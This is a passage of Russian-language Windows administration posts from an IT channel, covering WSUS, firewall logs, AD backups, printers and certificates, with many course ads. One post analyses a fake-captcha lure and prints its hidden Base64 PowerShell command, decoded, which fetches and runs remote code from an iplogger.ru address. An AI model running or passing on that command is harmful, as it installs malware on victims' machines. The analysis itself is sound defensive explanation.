WindowsITPro - winitpro.ru

⚠️В одном из недавних анонсов Microsoft сообщала, что компонент сервера обновлений Windows Server Update Services (WSUS), который доступен как отдельная роль во всех версиях Windows Server переходит в состояние устаревший (deprecated) начиная с Windows Server 2025. Это означает, что компоненты WSUS более развиваться не будут, хотя текущий функционал все еще будет поддерживаться и обновления публиковаться вплоть до окончания сроков поддержки соответствующих версий Windows Server.

ℹ️ Роль WSUS все еще доступна для установки в новом Windows Server 2025 (соответственно с датой окончания поддержки в 2034). MSFT по своей традиции будет заставлять переходить на облачные (считай платные) решения для обновлений клиентов и серверов, такие как Windows Autopatch, Microsoft Intune и Azure Update Manager.

🔥 Ниже собраны статья по установке, настройке и управлению собственного сервера обновлений WSUS для централизованного развертывания обновлений в корпоративной сети.

✅ Установка и настройка сервера обновлений WSUS на Windows Server
✅ WSUS: управление установкой обновлений Windows через GPO
✅ Одобрение обновлений на сервере обновлений WSUS
✅ Перенос одобренных обновлений между группами WSUS
✅ Ручной импорт обновлений на WSUS
✅ Установка/обновление сторонних программ через WSUS

🔥 Встроенный брандмауэр Windows Firewall по умолчанию не журналирует входящие и исходящие подключения, проходящие через него. Если у вас есть подозрение, что на компьютере Windows встроенный файервол блокирует подключение на конкретный порт или с определенного IP адреса, не нужно немедленно его полностью отключать, чтобы проверить это. Правильнее будет включить логирование отклоненных (DROP) соединений, найти в логах попытки подключения (источник, порт) и создать соответствующее разрешающее правило. 🧱

☑️ Можно включить запись логов в текстовый файл, например:

Set-NetFireWallProfile -Profile Public -LogBlocked True -LogMaxSize 20480 -LogFileName "%systemroot%\system32\LogFiles\Firewall\pfirewall.log" -Verbose 

☑️Или можно писать сетевые логи в журнал событий Windows (Event Viewer). Это иногда более удобно, чем грепать текстовые файлы. Для этого включается политика аудита:

Auditpol /set /category:"System" /SubCategory:"Filtering Platform Packet Drop" /failure:enable 

✅ В статье рассмотрено как включить лог Windows Firewall и базовые методы поиска и анализов логов брандмауэра.

Включаем логирование в Windows Firewall, анализ логов

⁉️Хотите создавать более стабильную и безопасную инфраструктуру на Kubernetes?

Приглашаем на открытый урок «CRI — обзор контейнерных runtime», где мы изучим ключевые компоненты контейнерной среды выполнения и разберём их роль в экосистеме Kubernetes. Регистрация

Погрузитесь в CRI, рассмотрите плюсы containerd, CRI-O и других сред, а также узнайте, как выбрать оптимальный контейнерный runtime для задач вашего проекта.

🔥Присоединяйтесь 2 декабря в 20:00 мск, чтобы усовершенствовать навыки работы с контейнерными платформами. Зарегистрируйтесь на вебинар и получите скидку на полный курс «Инфраструктурная платформа на основе Kubernetes»: https://otus.pw/AFcbl/

Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576, www.otus.ru

🔑Большинство крупных производителей компьютеров/ноутбуков с предустановленной Windows вшивают в BIOS или UEFI компьютера ключ для автоматической активации Windows.

💾 Во времена Windows 7 сертификат вендора, информация о редакции, и ключе продукта прошивались в специальную SLIC таблицу в BIOS. Сейчас от этого подхода практически отказались и вендор прописывает ключ (OEM embedded key) непосредственно в прошивку UEFI. Благодаря этому при установке Windows установщик считывает ключ продукта из прошивки и автоматически устанавливает редакцию, соответствующую ключу.

⚠️Проблема возникает, когда пользователь хочет выполнить чистую установку другой редакции Windows на такое устройство (например, Pro вместо предустановленной Home). Установщик Windows при этом пропускает окно выбора редакции и автоматически устанавливает версию, соответствующую ключу.

✅ Чтобы установщик Windows игнорировал информацию о вшитом ключе, нужно создать на установочной USB флешке в каталоге \sources файл ei.cfg с текстом:

[EditionID]
[Channel]
Retail

После этого при установке Windows, должно появится меню выбора редакций.
Нет выбора редакции при чистой установке Windows

🚑 MSDaRT (Microsoft Diagnostics and Recovery Toolset) это официальный инструмент от Microsoft для создания дисков восстановления (загрузочных дисков) на базе WinPE, ранее широко известный как ERD Commander. Несмотря, что этот проект уже давно не развивается и доступен при наличии подписки, для большинства не составит труда найти оригинальный образ Microsoft Desktop Optimization Pack (MDOP) и сгенерировать собственный диск DaRT для восстановления системы, который поддерживает в том числе последние билды Windows 10 и 11.

✅ Образ MSDaRT включает в себя базовые инструменты, для исправления типовых проблем, когда Windows не загружается или пользователь не может войти в систему:
🔹Средство разблокировки/сброса пароля администратора
🔹Утилиты восстановления удаленных файлов и разделов диска
🔹Графический проводник
🔹Инструмент удаления проблемных обновлений
🔹Средства проверки образа и другие

🛠 Администраторы могут самостоятельно интегрировать в загрузочный образ MS DaRT необходимые драйвера и portable утилиты, превратив его в полноценный LiveCD. Если в вашей корпоративной среде по соображениям безопасности запрещено использовать сторонние диски восстановления/ LiveCD, а функционала встроенной WinRE недостаточно, то образ DaRT будет хорошей отправной точкой для создания собственного образа восстановления Windows.

Создаем диск восстановления Windows на базе MSDaRT

⚠️Довольно часто от администраторов можно услышать распространенное мнение, что при наличии нескольких контроллеров домена Active Directory, дополнительно бэкапить AD не нужно. Аргументируется это тем, что вероятность выхода из строя сразу всех DC минимальна, а при поломке отдельного DC, проще поднять рядом на площадке новый и реплицировать на него каталог AD.

🌋Однако при этом забывают о сценариях, когда сразу все DC выходят из чата: это может быть атака вирусов/шифровальщиков, катастрофические сценарии с полной потерей ЦОДа, случайное (или преднамеренное) удаление целых разделов каталога, восстановление давно удаленных объектов. Все эти сценарии уже не раз случались и могут еще не раз произойти в реальной жизни.
Именно для предотвращения таких случаев нужно обязательно настраивать бэкап AD.
✅ Если у вас нет отдельной системы резервного копирования, которая умеет в AD, можно настроить регулярный бэкап контроллера домена с помощью встроенных средств Windows Server Backup.

🛠В статье показан пример PowerShell скрипта, использующий встроенную консольную утилиту WSB (wbadmin.exe) для резервного копирования System State контроллера домена в сетевую папку, а также пример задания планировщика для автоматического резервного копирования Active Directory

Резервное копирование контроллеров домена AD с помощью встроенных средств Windows Server Backup

🎓 Согласно схеме лицензирования Microsoft все пользователи или клиентские устройства, подключающиеся к рабочему столу на терминальном сервере/ферме RDS должны быть лицензированы. Для выдачи и отслеживания клиентских терминальных лицензий используется отдельная роль Windows Server под названием Remote Desktop Licensing.

🛠 По ссылке доступен полный гайд по установке и настройке сервера лицензирования RDS на Windows Server версий от 2016 до 2022. В статье рассмотрены:

1️⃣ Установка роли роли RDS-Licensing
2️⃣ Активация сервера лицензий RDS и установка паков клиентских лицензий (RDS CAL)
3️⃣ Отличия между RDS Per Device и Per User лицензиями (CAL), совместимость старых RDS CAL с более новыми версиями Windows Server
4️⃣ Настройка хостов RDSH на использование сервера лицензий RDS (через GPO или PowerShell), используемые сетевые порты
5️⃣ Управление лицензиями RDS CAL, отчеты, отзыв выданных CAL

Установка и активация сервера лицензирования RDS на Windows Server

👍Узнайте, как работать со сложными обращениями в службу поддержки!

На бесплатном уроке онлайн-курса «Специалист по поддержке пользователей в IT» — «Работа со сложными обращениями в службу поддержки. И причём тут постмортем?»: регистрация

О чем поговорим:

– про назначение поддержки

– только ли закрытие обращений может быть у поддержки

– что делать, если произошёл крупный инцидент?

– вы познакомитесь с примерами сложных обращений, как поддержка помогает пользователям или бизнесу

– что такое постмортем, и как поддержка участвует в нём?

🔥После вебинара вы сможете продолжить обучение на курсе со скидкой Чёрной пятницы - 15%!

Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576

💾 Функция автоматического резервного копирования файлов реестра по-умолчанию отключена начиная с Windows 10 1809. И зря. Ради минимальной экономия места (100-200 Мб) пользователи потеряли возможность быстро восстановить работоспособность Windows, просто заменив поврежденные файлы реестра рабочими версиями из резервный копии. Хотя этой функцией большинство пользуется крайне редко, лучше иметь такой бэкап, чем совсем никакого 🤷‍♂️.

✅ Включить автоматический бэкап в последних версиях Windows 10 и 11 можно, создав в реестре параметр EnablePeriodicBackup:

reg add "HKLM\System\CurrentControlSet\Control\Session Manager\Configuration Manager" /v EnablePeriodicBackup /t REG_DWORD /d 1

Теперь задание автоматического обслуживания системы (в Windows 11 запускается раз в сутки) будет дергать задание планировщика RegIdleBackup, которое будет копировать файлы кустов реестра в каталог

%windir%\System32\config\RegBack

Включить автоматический бэкап системного реестра в Windows 10/11

Хотите ли вы получить мощный веб-сервер, который переплюнет Nginx? 😁

Узнайте как на вебинаре "Веб-сервер Angie на РЕД ОС"!

Представьте себе:
Вы с легкостью устанавливаете и настраиваете Angie на РЕД ОС.
Запускаете свои веб-приложения с непревзойденной производительностью.
Используете уникальные возможности Angie!

На этом увлекательном открытом уроке👇

Вы узнаете, почему Angie — это революционный шаг в мире веб-серверов.
Поймете ключевые различия между Angie и Nginx.
Научитесь практически применять уникальные возможности Angie.

Запишитесь на бесплатный открытый урок прямо сейчас, и получите список литературы для развития ПРО навыков администратора: https://otus.pw/nFlp/

До 17 ноября скидка 10% на курс Расширенное администрирование РЕД ОС!

🖨Принтеры HP могут показывать пользователям различные всплывающие уведомления о состоянии принтера. Особо раздражают постоянно всплывающие уведомления об использовании неоригинальных (заправленных) картриджей HP.

ℹ️ Для отправки этих уведомлений используется функция Status Notification Pop-up (SNP) в драйвере печати HP, которая опрашивает состояние принтера по SNMP. Эта функция отключена по-умолчанию начиная с версии HP Universal Print Driver 6.4.1. Поэтому чтобы избавиться от всплывающих уведомления от сетевых принтеров, достаточно обновись драйвер. HP UPD.
🔹 Если не хотите обновлять драйвер, можно отключить отправку уведомлений SNP в настройках драйвера принтера HP. Или воспользуйтесь утилитой setup.exe, включенной в состав Universal Print Driver:

install.exe /gdssnp /ni /q /nd

Отключить всплывающие уведомления для принтеров HP

Столкнулись с Kubernetes на работе, но не уверены в своих знаниях?

Поможем DevOps-инженерам и сисадминам освоить навыки работы с кластером на обновленном курсе «Kubernetes База» от Слёрма. 

За 6 недель научитесь: 

🔵работать с K8s
🔵запускать кластер
🔵работать с базовыми абстракциями и подключать дополнительные компоненты
🔵запускать приложение в кластере 
🔵настраивать CI/CD пайплайн

Специальное предложение:
при покупке курса «Kubernetes База»➡️видеокурс «Мониторинг в Grafana» в подарок

Вас ждет: 

➡️ 63 часа практики
➡️ 5 встреч и чат с поддержкой спикера
➡️ итоговая сертификация

Старт 16 декабря
Занять место на курсе — по ссылке ⬅️

#реклама
О рекламодателе
erid: LjN8K2i4T

🖥Установка единых обоев рабочего стола и экрана блокировки Windows в корпоративном стиле - один из самых популярных способов создания единого визуального пространства для сотрудников и клиентов. Одинаковые обои придают рабочему пространству более профессиональный и упорядоченный вид, что может положительно сказаться на восприятии компании клиентами и партнерами.

🔹 Рисунок обоев может включать логотипы, графику в корпоративных цветах или изображения, связанные с деятельностью компании. На рисунок обоев можно наложить полезную информацию для сотрудников (телефоны и адреса тех. поддержки, важные объявления, etc).
🔹 Через GPO можно заблокировать смену обоев, чтобы пользователи не заменяли корпоративные фоны на неуместные или провокационные картинки.

✅ В статье описано как с помощью групповых политик распространить на компьютеры пользователей изображения для фонового рисунка рабочего стола и фона экрана входа в систему (экрана блокировки Windows).
Задать фоновый рисунок рабочего стола и экрана блокировки Windows через групповые политики

👌Что нужно знать и уметь саппорту, чтоб сделать карьеру?

Узнайте на бесплатном уроке онлайн-курса «Специалист по поддержке пользователей в IT» — «Какие навыки должны быть у сотрудника технической поддержки?»: регистрация

О чем поговорим:
- Про области знаний у сотрудника технической поддержки.
- Какие из них обязательны, а какие являются дополнительным преимуществом?
- Какие знания сотрудник поддержки будет иметь вне зависимости от размера и зрелости компании?
- Какие навыки и умения пригодятся сотруднику технической поддержки при дальнейшем карьерном развитии, а от каких придётся отказаться?

Кому подходит этот урок:
- IT-специалистам, которые хотят расширить своё понимание роли специалиста поддержки
- Тем, кто хочет «войти в IT» и разобраться, что именно должен знать и уметь сотрудник поддержки
- Сотрудникам поддержки, которые хотят понять, какие области знаний нужно «подтянуть», чтобы увеличить уровень заработка

🔥После вебинара вы сможете продолжить обучение на курсе по спеццене, в том числе, в рассрочку.

Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576

Бесплатное IT-образование в 2024

Отобрали для вас полезные телеграм-каналы, которые помогут освоить программирование и другие IT-направления

Выбирайте нужное и подписывайтесь:

👩‍💻 DevOps: @loose_code
📱 GitHub: @git_developer
🤓 Книги айти: @portalToIT
🤔 Хакинг & ИБ: @cybersecinform
🐞 Тестирование: @QAPortal
👩‍💻 Python: @PythonPortal
👩‍💻 Frontend: @FrontendPortal
⚙️ Backend: @BackendPortal
👩‍💻 Java: @Java_Iibrary
👩‍💻 C#: @KodBlog
👩‍💻 С/С++: @Cpportal
🖥 Базы Данных & SQL: @SQL
👩‍💻 Golang: @juniorGolang
👩‍💻 PHP: @PHPortal
👩‍💻 Моб. разработка: @MobDev
👩‍💻 Разработка игр: @GameDevgx
🖥 Data Science: @DataSciencegx
📱 Маркетинг: @MarketingPortal
🖥 Дизайн: @PortalToDesign

➡️ Сохраняйте себе, чтобы не потерять

🎯 На днях наткнулся на довольно забавный сценарий атаки, цель которой установка вредоносного ПО на компьютер Windows. В самом векторе атаки нет ничего не обычного, кроме пожалуй того, что для внедрения зловреда используются возможности PowerShell.

👉 Итак, при перенаправлении скриптом с вероятно зараженного сайта на прокладочную веб-страничку в браузере появился запрос на прохождение некой капчи. Для прохождения проверки пользователю предлагалось нажать кнопку на странице, а затем Win +R -> Ctrl+V -> Enter. Выполнив эту инструкцию, пользователь запустит к себе зловреда. 🤦‍♂️
🛑 Что под капотом? При нажатии кнопки на сайте в буфер обмена копируется строка вызова PowerShell вида:

powershell -W Hidden -eC aQBlAHgAIAAoAGkAdwByACAAaAB0AHQAcABzADoALwAvAGkAcABsAG8AZwBnAGUAcgAuAHIAdQAvADIANQAwADkAMgA1ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAC4AQwBvAG4AdABlAG4AdAA=

🔹Из аргументов понятно, что это должно запустить скрытый PowerShell процесс (-W Hidden), который должен выполнить некую закодированную команду (-eC). Предполагается что это строка будет запущена доверчивым пользователем через стандартное окно "Выполнить" в меню Пуск.
🔹Сама выполняемая команда обсфуцирована с помощью кодировки Base64. Чтобы получить PowerShell команду в исходном виде, нужно декодировать ее из Base64 с помощью простой функции:

[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String("aQBlAHgAIAAoAGkAdwByACAAaAB0AHQAcABzADoALwAvAGkAcABsAG8AZwBnAGUAcgAuAHIAdQAvADIANQAwADkAMgA1ACAALQBVAHMAZQBCAGEAcwBpAGMAUABhAHIAcwBpAG4AZwApAC4AQwBvAG4AdABlAG4AdAA="))

Что вернуло исходный код:

iex (iwr https://iplogger.ru/250925 -UseBasicParsing).Content

▶️ В данном случае iex (алиас для Invoke-Expression) используется для запуска следующей команды iwr (Invoke-WebRequest). IWR позволяет получить содержимое веб страницы, на которой размещен PowerShell код для внедрения зловреда. В результате будет запущен PowerShell скрипт, который скачает ZIP архив, распакует его и запустит некий процесс setup.exe. Дальше – дело техники. 👌

✅ В общем-то довольно нехитрая атака, сценарий реализации основан на социальной инженерии, когда пользователь бездумно выполнит инструкцию на фишинговом сайте. Включенная по умолчанию политика запуска скриптов PowerShell Execution заблокирует запуск такого скрипта, но все же не даст 100% гарантии, т.к. можно запустить скрипт и в обход политики.

Подписывайтесь на канал Цифровизируй это!
Внутри — последние новости из мира стартапов, ИТ, управления проектами, кибербезопасности и других от команды VK Tech. А еще там вы найдете разборы от экспертов, гайды, чек-листы и приглашения на тематические мероприятия!
Переходите по ссылке

✅ Пропустил новость, что первого ноября официально релизнулся Windows Server 2025.

Что нового:

🔹 Hot patching для клиентов Azure Arc – установка обновлений безопасности без перезагрузки
🔹 Улучшенная производительность для NVMe хранилищ – до 70% увеличение IOPS по сравнению с предыдущими версиями на идентичном оборудовании
🔹 Active Directory - новый функциональный уровень домена и леса AD; расширенные возможности восстановления удаленных объектов; поддержка NUMA благодаря чему службы ADDS могут задействовать все ядра CPU.
🔹 Включенный по умолчанию Credential Guard для защиты учетных данных
🔹 SMB over QUIC - для безопасного доступа к файловым ресурсам через Интернет
🔹 Новый тип управляемых учетных записей AD с автоматическим меняющимися паролями– делегируемые учетные записи (dMSA, delegated Managed Service Account)
🔹 Блочное клонирование – значительное повышение скорости копирования файлов на файловой системе ReFS для Dev Drive
🔹 OpenSSH установлен по умолчанию
🔹 WinGet установлен по умолчанию
🔹 Служба удаленного доступа RRAS не поддерживает устаревшие VPN протоколы PPTP и L2TP
🔹 Новые возможности в LAPS
🔹 AccelNet (Accelerated Networking)– увеличение производительности и снижение нагрузки на CPU для виртуальных машин при использовании SR-IOV в кластере
🔹 DTrace – встроенная утилита для отслеживания и устранения неполадок в работе системы в реальном времени.
🔹 Виртуализация GPU в виде разделения GPU или Multi-Instance GPU
🔹Также можно отметить защиту ключей на основе виртуализации и функцию беспроводной локальной сети, которая теперь установлена по умолчанию.

🔄 Windows Server 2025 доступен через два канала: долгосрочный канал обслуживания (LTSC) и годовой канал (AC, Annual Channel). Основная поддержка завершится 9 октября 2029 года, а расширенная — 10 октября 2034 года

Подробное описание всех новых возможностей на официальном сайте:

What's new in Windows Server 2025

🔄 Стандартный установщик setup.exe в дистрибутивах Windows можно использовать не только для интерактивной установки операционной системы, но и для обновления версии (билда) Windows на компьютере. Кроме интерактивного режима, setup.exe поддерживает параметры командной строки, которые можно использовать для офлайн обновления билда Windows.

1️⃣ Проверить, совместим ли компьютер с новым билдом Windows 11, который находится в установочном (оффлайн) образе:

start /wait SETUP.EXE /Auto Upgrade /NoReboot /DynamicUpdate Disable /Compat ScanOnly

Статус проверки на совместимость будет содержаться в переменной:

echo %errorlevel% 

2️⃣ Выполнить апгрейд билда Windows из офлайн образа в тихом режиме:

start /wait .\W1124h2\SETUP.exe /auto upgrade /DynamicUpdate disable /showoobe None /Telemetry Disable /Copylogs %SystemDrive%\temp /EULA Accept /compat IgnoreWarning /NoReboot

✅ С помощью параметров командной строки setup.exe можно автоматизировать тестирование возможности обновления и непосредственно обновление билда Windows 10/11 на компьютерах пользователей с помощью SCCM, MDT или других средств автоматизации.

Ручное обновление билда (версии) Windows из командной строки

Хотите освоить управление файлами в РЕД ОС как профессионал? Приходите на бесплатный открытый урок "Работа с файлами и каталогами в РЕД ОС"!

🔥 Погружение в мир файловой системы РЕД ОС:
Разберемся с основами: файлы, каталоги, пути, и как они работают.
Научимся создавать, редактировать, переименовывать файлы и папки, словно вы гуру Linux.
Освободим вас от страха перед командной строкой, научимся создавать новые файлы с помощью удобных команд.
Прокачаем ваши навыки навигации по файловой системе: абсолютные и относительные пути, никаких "заблуждений"!
Поймем, как работать с пробелами и специальными символами, чтобы больше не было неприятных сюрпризов.

💪 Кому будет полезно:
Системным администраторам, уже знающим Linux, но желающим покорить РЕД ОС.
Тем, кто хочет выйти за рамки базовых знаний и освоить тонкости управления файлами.

🎁 Что вы получите:
Практические навыки использования команд для работы с файлами и каталогами.
Уверенность в организации файловой структуры, чтобы найти нужный файл за секунды.

⏱️ Запись на урок и дополнительные вопросы: https://otus.pw/77Ml/

Не откладывайте на потом, начинайте осваивать РЕД ОС уже сегодня!
Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576

K2 Cloud + DevOops Conf = бесплатный день конференции для инженеров 💜

Ребята из K2 Cloud помогли организовать Community Day для DevOps-специалистов. 6 ноября ты сможешь бесплатно послушать часть докладов конференции DevOops: от основ работы сертификатов до организации Flux CD monorepo. Для участия нужно только зарегистрироваться.

Подробнее на сайте

⏰Функционал ограничения доступа к компьютеру по времени в составе родительского контроля (Microsoft Family Safety) в Windows 10 и 11 доступен только для учетных записей Microsoft (облачных). Для локальных учетных записей, можно настроить ограничения для входа в компьютер по времени из командной строки с помощью net use. Чаще всего это используется, когда нужно включить простейшее ограничение времени нахождения ребенка за компьютером.

✅ Например, следующая команда разрешит локальному пользователю maxim вход по будням с 9 до 10, и с 14 до 19, а в выходные с 12 до 14 (мин. шаг времени 1 час):

net user maksim /times:M-F,9:00-10:00,14:00-19:00;Sa-Su,12:00-14:00

Вывести текущие настройки ограничения:

net user maksim

Cбросить ограничения по времени входа:

net user maksim /time:all

🔹 Затем с помощью параметра групповой политики Set Action to take when logon hours expire нужно указать, нужно ли завершить или заблокировать сессию пользователя, когда разрешенное время работы истекло.
Ограничение по время работы (входа) в Windows для локальных пользователей

РЕД ОС подходит для использования в гос. учреждениях, объектах КИ. Она востребована везде, где важен вопрос безопасности и санкционная устойчивость.

30 октября узнайте все о работе с дисками в РЕД ОС! Вместе с Никитой Климовым разберемся в темах:
- Современная адресация дисков: Поймете, как эффективно управлять дисковым пространством.
- Логические диски и их применение: Узнаете, где и как использовать логические диски для оптимизации работы.
- Инструменты ОС для работы с дисками: Освоите полезные утилиты, такие как fdisk и lsblk.

Используйте время с пользой, чтобы:
1️⃣ Получить практические знания, задать вопросы и получить конкретные решения для своих задач.
2️⃣ Оценить все возможности РЕД ОС и ее мощные инструменты.

✔️Запишитесь сейчас и поднимите свой уровень администрирования: https://otus.pw/xzmD/

Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576

⌛️Периодически встречаются ситуации, когда пользователь просит продлить срок действия его пароля в AD. Обычно это связано со сценариями удаленного подключения к домену (VPN, веб-клиенты), когда пользователь не может вовремя сменить свой пароль (нет инструментов), а работу работать надо.

⚠️Самое простое это поставить галку и включить ему бессрочный пароль, но скорее всего вы про это забудете и у пользователь остается пароль без ограничения срока действия.
📝 Время последней смены пароля учетной записи в AD хранится в атрибуте pwdLastSet. Напрямую отредактировать значение этого атрибута и указать здесь произвольную дату нельзя. Однако этому атрибуту можно последовательно задать два значения:

Set-ADUser a.ivanov -Replace @{pwdLastSet='0'}
Set-ADUser a.ivanov -Replace @{pwdLastSet='-1'}

✅ Это сбросит дату установки пароля на текущую, продлив его срок действия и пользователь сможет продолжить работу

Продлить время истечения (срок действия) пароля пользователя в AD

Хочешь вывести карьеру на новый уровень?

Прояви себя в Лиге Цифровой Экономики!

У нас ты:
- Станешь частью команды профессионалов, работающих над амбициозными проектами
- Получишь возможность реализовать творческий потенциал и внести свой вклад в развитие ключевых отраслей
- Будешь работать над сложными и интересными задачами, которые позволят расширить твои знания и навыки
- Сможешь влиять на развитие компании и рынка, участвуя в масштабных внедрениях

Не упусти шанс стать частью команды, которая меняет мир ИТ!

Подписывайся на наш канал и узнай все о наших вакансиях и проектах.

https://tglink.io/14ca940286bd 

Реклама. ООО "ЭЙТИ КОНСАЛТИНГ". ИНН 7715744096.erid: LjN8KUY5m

⚠️ Несколько раз встречался со странным багом в консоли PowerShell, когда при наборе или вставке кода в cli не печатаются/вырезались заглавные буквы. Проблема возникала только тогда, когда при запуске процесса powershell.exe в системе выбрана кириллическая раскладка.

✅Решение сводится к обновлению модуля PSReadLine на более свежую версию путем переустановки:

get-module|where name -eq "psreadline"|select name,path 
remove-module psreadline 
remove-item "c:\program files\windowspowershell\modules\psreadline\*" -recurse -force
Install-Module PSReadLine

Модуль PSReadLine обеспечивает подсветку синтаксиса, автозавершение команд, историю команд PowerShell и другие полезные функции, делающие работу в консоли более удобной:
https://winitpro.ru/index.php/2024/10/15/zaglavnye-bukvy-v-powershell/

Планируете использовать Astra Linux и хотите узнать, как настраивать терминалы?

Если вы уже работали с Linux-системами, приходите на открытый вебинар OTUS
«Работа в терминале и основы работы в командной строке ОС Astra Linux».

Вы узнаете:
- как настраивать терминал для удобной работы?
- какие команды нужны для безопасного входа и выхода из системы?
- какие форматы записи параметров команд существуют?
- как задавать и использовать переменные окружения?
- как использовать истории команд для повторного вызова и редактирования ранее введённых команд?
- как создавать и использовать псевдонимы для упрощения ввода часто используемых команд?

Вебинар проведёт старший IT-консультант по инфраструктурным решениям из крупнейшей IT-компании

Будет интересно системным администраторам, которые работают с Linux

После вебинара вы можете приобрести курс «Расширенное администрирование Astra Linux».

23 ноября, 19:00
Бесплатно

Записаться на вебинар: https://otus.pw/HZTB/

Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576, www.otus.ru

🔄 Несмотря на то, что Microsoft убрала требование регулярной смены паролей пользователей из своих рекомендаций безопасности, в большинстве on-prem доменов Active Directory по прежнему включена политика, ограничивающая макс. срок действия паролей.

🤦‍♂️Часто пользователи забывают (или не могут из за особенностей подключений к сети) вовремя сменить свой пароль, срок действия которого истекает, что вызывает лишние обращения в службу поддержки.

✅ В статье показано как узнать, когда истекает пароль пользователя в домене, и как заблаговременно напомнить пользователю о том, что нужно сменить пароль: с помощью встроенного напоминания Windows, скрипта PowerShell и email оповещения.

Напоминание о смене пароля пользователя в домене AD

🖨 Для выполнения типовых задач управления принтерами на компьютерах пользователей, не обязательно подключаться к рабочему столу пользователя. Большинство операций можно выполнить удаленно через консоль PowerShell.

📱 Например, создание нового принтера на удаленном компьютере в сессии PowerShell может выглядеть так:

🔹 Подключаемся к компьютеру пользователя через PowerShell Remoting:

Enter-PSSession -ComputerName Comp1

🔹Добавление драйвера в хранилище драйверов:

pnputil.exe -i -a "\\server1\drivers\KYOCERA\ OEMsetup.inf" 

🔹Установка драйвера печати:

Add-PrinterDriver -Name "Kyocera Classic Universaldriver PCL6"

🔹Создать IP порт печати для подключения сетевого принтера:

Add-PrinterPort -Name "IP_192.168.10.26" -PrinterHostAddress "192.168.10.26" 

🔹Создать новый принтер:

Add-Printer -Name "Ricoh IM 2702" -DriverName "Kyocera Classic Universaldriver PCL6" -PortName "IP_192.168.10.26" -Verbose 

Управление принтерами и драйверами печати в Windows из PowerShell

Хотите узнать, как Git может качественно изменить вашу командную работу в 1С?

Ждем вас на открытом вебинаре 14 октября в 19:00 мск, где мы разберем:

- как разворачивать командную разработку с использованием Git;
- как обойтись без хранилища 1С;
- как изменится ваша работа при переходе на Git.

Урок для разработчиков 1С, системных администраторов и руководителей команд.

Спикер Юрий Пасхин — программист-разработчик в ЕАЕ-Консалт, опытный руководитель проектов, архитектор и преподаватель.

Встречаемся в преддверии старта курса «DevOps 1С». Все участники вебинара получат специальную цену на обучение! Регистрируйтесь прямо сейчас, чтобы не пропустить мероприятие: https://vk.cc/cC9QB4

Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576, www.otus.ru

В догонку к предыдущему посту об использовании сертификатов Let's Encrypt в Windows

📜 Если вы решили отказаться от использования бесплатного сертификата Let’s Encrypt на своем веб-сервисе (переходите на коммерческий или свой собственный CA), нужно выполнить ряд шагов:

🔹 Удалить (отключить) задание планировщика для автоматического продления сертификата
🔹Отозвать старый сертификат Let’S Encrypt
🔹Отключить использование сертификата Let’S в настройках веб сайта IIS или службах RDS
🔹Удалить сертификат из хранилища сертификатов WACS
🔹Удалить клиент WACS и связанные файлы
🔹Очистить каталог C:\ProgramData\win-acme\

✅ Удаление TLS/SSL сертификата Let’s Encrypt в Windows

✈️ В Telegram появился канал от web-ресурса NetworkAdmin.ru

В нем — автор делится полезной информацией про Windows/Linux, актуальными уязвимостями, а также историями основанными на личном опыте в IT.

🧑‍💻 Подпишись @networkadminru

💼 В классических версиях Microsoft Office (основанных на MSI установщиках), если одно из установленных обновлений ломало функционал всего пакета или одной из программ, чтобы исправить проблему, достаточно было удалить обновление из панели управления или с помощью утилиты wmic. Такие MSI-based версии MS Office получают обновления по каналам Microsoft Update/WSUS.

🔄 C2R (Click-to-Run) версии Microsoft Office, такие как Office 2021, 2019 и Microsoft 365 Apps, получают обновления через систему, отличную от традиционных MSI версий. Используется собственная система обновлений C2R, которая в фоновом режиме устанавливает и скачивает последние версии файлов из сети Microsoft CDN.

✅ Чтобы откатиться к предыдущему релизу в C2R версиях Office нужно
1️⃣Отключить автоматическое обновление в настройка пакета приложений Office
2️⃣ Получить номер билда предудущих релизов Office на сайте Microsoft
3️⃣ Выполнить откат (а по сути установку) предыдущей версии с помощью утилиты officec2rclient.exe. Например:

officec2rclient.exe /update user updatetoversion=16.0.17928.20156

4️⃣ При этом ваша версии Office перестанет обновляться автоматически. Придется отслеживать выход новых билдов и тестировать их, пока проблема не будет исправлена. После этого можно включить автоматическое обновление

Как откатить Microsoft Office до предыдущей версии

🔒Некоммерческий Центр сертификации Let's Encrypt позволяет получить Domain Validation TLS сертификаты со сроком действия 90 дней. Это самый популярный CA для получения бесплатных доверенных сертификатов для веб сайтов и сервисов.

🛠 Для получения и перевыпуска Let’s Encrypt сертификатов в Windows можно использовать open-source клиента WACS (Windows ACME Simple). Это консольная утилита, которая позволяет получать сертификаты как в интерактивном, так и в автоматическом режиме с помощью аргументов командной строки.
🔃Утилита WACS позволяет автоматизировать процедуру проверки прав на домен, выпуск, установку и обновления сертификата, когда срок его действия подходит к концу.

✅ В статье рассмотрено, как получить Let’s Encrypt и привязать его к сайту IIS на Windows Server, а также как использовать полученный TLS для защиты подключений к службе шлюза Remote Desktop Gateway.

Получение и установка TLS сертификатов Let's Encrypt в Windows

Хотите углубить свои знания в управлении данными и состояниями приложений в Kubernetes?

⌨️ Ждём вас на открытом вебинаре 8 октября в 20:00 мск, где мы разберем:

- различные типы Volume в Kubernetes и их особенности: EmptyDir, HostPath, PersistentVolume (PV), PersistentVolumeClaim (PVC), и StorageClass (SC);
- как эффективно использовать связку PV+PVC+SC для динамического выделения и управления хранилищем данных;
- основы работы со StatefulSet для управления состояниями приложений, их масштабирования и обновления.

Урок для backend-разработчиков, DevOps-инженеров и SRE-специалистов, стремящихся улучшить свои навыки в управлении данными и состояниями в Kubernetes.

Встречаемся в преддверии старта курса «Инфраструктурная платформа на основе Kubernetes». Все участники вебинара получат специальную цену на обучение!

🚀 Регистрируйтесь прямо сейчас, чтобы не пропустить мероприятие: https://vk.cc/cBPqNy

Реклама. ООО «Отус онлайн-образование», ОГРН 1177746618576

👥 В наземной Active Directory, в отличии от облачной службы каталогов Entra ID (ex. Azure AD), нельзя создавать динамические группы безопасности, в которые автоматически включаются пользователи (компьютеры), соответствующие некоторому критерию. Например, все пользователи в определенном OU, все пользователи у которых в атрибуте Department указано Маркетинг, все сотрудники филиала и т.д.

